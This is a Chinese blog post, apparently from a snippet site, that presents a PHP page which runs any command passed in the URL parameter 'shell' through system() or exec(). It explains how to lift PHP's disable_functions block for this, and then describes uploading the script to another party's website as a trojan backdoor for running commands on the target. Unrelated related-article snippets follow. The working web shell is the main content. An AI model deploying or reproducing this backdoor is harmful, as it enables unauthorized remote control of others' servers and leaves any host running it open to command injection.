网页linux管理系统——通过网址提交linux命令,获取执行结果(代码片段)

罗四强 罗四强     2022-12-12     497

关键词:

目录

网页提交Linux命令

先上效果

环境要求

 注意:

  首先看一下system()和passthru()两个功能类似,可以互换:

  

  exec()的使用示例: 


·


 

网页提交Linux命令

在做Linux服务器管理的时候,我们都需要登录到服务器上,来执行命令,获取服务器的相关进程、状态、磁盘空间使用情况等等。

那么我们 可不可以,直接在网页端,通过访问Linux服务器的某个网页管理界面。在浏览器中输入Linux命令,直接在网页上获取命令执行结果呢?

先上效果

直接通过http链接,传入命令参数,执行并返回结果。

环境要求

php执行shell命令,可以使用下面几个函数: 

string system ( string $command [, int &$return_var ] )

string exec ( string $command [, array &$output [, int &$return_var ]] )

void passthru ( string $command [, int &$return_var ] )

 注意:

这三个函数在默认的情况下,都是被禁止了的

如果要使用这几个函数,

就要先修改php的配置文件php.ini

查找关键字disable_functions,将这一项中的这几个函数名删除掉

然后注意重启apache。

  首先看一下system()和passthru()两个功能类似,可以互换:

<?php
    #获取网页传递参数
    $shell = $_REQUEST['shell'];
    echo "<pre>";
    system($shell, $status);
    echo "</pre>";
    //注意shell命令的执行结果和执行返回的状态值的对应关系
    $shell = "<font color='red'>$shell</font>";
    if( $status )
        echo "shell命令$shell执行失败";
     else 
        echo "shell命令$shell成功执行";
    
?>

访问地址,并传递shell参数

http://localhost:81/shell.php?shell=ipconfig

  注意,system()会将shell命令执行之后,立马显示结果,这一点会比较不方便,因为我们有时候不需要结果立马输出,甚至不需要输出,于是可以用到exec()

  

 

  exec()的使用示例: 

<?php
    $shell = $_REQUEST['shell'];
    exec($shell, $result, $status);
    $shell = "<font color='red'>$shell</font>";
    echo "<pre>";
    if( $status )
        echo "shell命令$shell执行失败";
     else 
        echo "shell命令$shell成功执行, 结果如下<hr>";
        print_r( $result );
    
    echo "</pre>";
?>

exec()执行shell命令成功,但是并不返回结果,需要使用输出命令,输出$result结果

作为木马小后门,上传到对方服务器下的网站目录下,访问该地址,就可以在靶机上执行你想执行的命令,并且拿到回显结果。

 

网页linux管理系统——通过网址提交linux命令,获取执行结果(代码片段)

目录网页提交Linux命令先上效果 环境要求 注意:  首先看一下system()和passthru()两个功能类似,可以互换:    exec()的使用示例:  ·  网页提交Linux命令在做Linux服务器管理的时候,我们都需要... 查看详情

求linux系统下载网址

最近找了几个linux系统iso文件下载网址,都没有下载到可以使用的linuxiso文件,希望找一个可以使用的linuxiso文件下载网址,谢谢看你好像也不怎么懂Linux,给你介绍国内的发行版吧:1、LinuxDeepin深度http://www.linuxdeepin.com/index.cn.html... 查看详情

中科磐云linux操作系统渗透测试

通过本地PC中渗透测试平台Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为FLAG提交;FLAG:MySQL5.1.73-log通过本地PC中渗透测试平台Kali对服务器场景Linu... 查看详情

linux中的cksum如何通过java实现

通过Java代码实现对网页数据进行指定抓取方法思路如下:在工程中导入Jsoup.jar包获取网址url指定HTML或者文档指定的body获取网页中超链接的标题和链接获取指定博客文章的内容获取网页中超链接的标题和链接的结果参考技术Acksum... 查看详情

如何在linux播放网页音乐

如何在linux播放网页音乐Linux系统播放网页音乐,可以安装跨平台的Firefox浏览器(火狐),安装后打开音乐网站就可以在线播放音乐了。1、首先从官网下载最新的火狐版本(Linux版):http://firefox.com.cn/2、解压火狐浏览安装包tar ... 查看详情

2023年广东省网络安全竞赛——linux操作系统渗透解析(超级详细)

...er06服务器场景操作系统:Linux(版本不详)(关闭连接)通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;通过本地PC中渗透测试平台Kali对服务... 查看详情

java项目部署在linux服务器上,用本地windows系统通过浏览器访问项目,项目网页上有一个

...ux服务器上,用本地windows系统通过浏览器访问项目,项目网页上有一个按钮,点击是调用第三方webservice接口获取附件(.doc结尾)获取过来的附件如何保存在windows本地?,现在是可以保存在linux上,如何在程序中获取过来的文件怎... 查看详情

如何在 Linux 中通过 perf 工具捕获 L3 缓存命中和未命中

】如何在Linux中通过perf工具捕获L3缓存命中和未命中【英文标题】:HowtocatchtheL3-cachehitsandmissesbyperftoolinLinux【发布时间】:2013-08-1113:20:58【问题描述】:有什么方法可以通过Linux中的perf工具捕获L3缓存命中和未命中。根据perflistcac... 查看详情

linux操作系统渗透测试

...a;toorWindows7渗透机用户名:administrator密码:1234561.通过Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OSDetails:”之后的字符串作为Flag提交;在终端中输入nmap-O172.16.105.250 从回显中我... 查看详情

如何使用 C++ 保存网页? Windows 或 Linux 系统

】如何使用C++保存网页?Windows或Linux系统【英文标题】:HowdoIsaveawebpageusingC++?WindowsorLinuxSystem【发布时间】:2015-04-0919:34:11【问题描述】:我需要知道如何在Windows和/或Linux上使用C++保存网页。第1步)这是我当前打开网页的代码... 查看详情

svn更新时不能打开新文件svn-base系统找不到指定的文件

...说可以这样处理,但没测试过  解决方案A)(推荐)  1.提交你工作副本中的改变到版本库  2.使用版本库的浏览器立即重命名该文件的大写(小写)为小写(大写)  3.更新你的工作副本  解决方案B)  1.使用TortoiseSVN子菜单... 查看详情

如何在linux下通过weiphp开发微信?linux下如何安装weiphp??

如何在linux下通过weiphp开发微信?Linux下如何安装weiphp??小白求教方法一1、将weiphp压缩包解压并上传到linux服务器。2、通过ip或者域名首次在浏览器中访问index.php,将会进入安装向导。方法二1、在本地将weiphp安装成功(win7系统... 查看详情

linux驱动之输入子系统

...层硬件对用户输入访问的响应转换为标准的输入事件,再通过核心层提交给事件处理层;而核心层对下提供了设备驱动层的编程接口,对上又提供了事件处理 查看详情

linux下,/etc/hosts文件有啥用途

...用来屏蔽广告和木马。一旦找到,系统会立即打开相应的网页,如果没有找到,则系统会将url提交到DNS服务器进行IP地址解析,etc/host代表当前计算机主机名。扩展资料:linux中的执行语句有:1、[root@localhost~]#cat/etc/profile:检查/e... 查看详情

linux进程管理

一、进程管理简介进程是正在执行的程序或命令,每一个进程都是一个运行实体,都有自己的地址空间,并占用一定的系统资源。进程管理的作用:  1、判断服务器的健康状态  2、查看系统中的所有进程  3、杀死进程二... 查看详情

运维工程师网址导航

Linux/Unix系统教程 鸟哥私房菜Linux系统教程,从入门到高级,全面覆盖,学习Linux必备howtoforge一个内核级的教程,这个教程相当不错lartc一个关于Linux网络路由,过滤和传输的教程LearnUnixSoftLookup的一个全面的UNIX教程,完全可以... 查看详情

调用操作系统打开网址?

】调用操作系统打开网址?【英文标题】:Calltooperatingsystemtoopenurl?【发布时间】:2011-05-1203:30:31【问题描述】:我可以使用什么来调用操作系统以在用户默认使用的任何浏览器中打开URL?不担心跨操作系统兼容性;如果它在linux... 查看详情

linux软件包管理

.../Linux  上运行的软件。用户们急需系统提供一种方法来管理这些安装在机器上的  软件,当Debian诞生时,这样一个管理工具也就应运而生,它被命名为  dpkg。从而著名的“package”概念第一次出现在GNU/Linux系统中,... 查看详情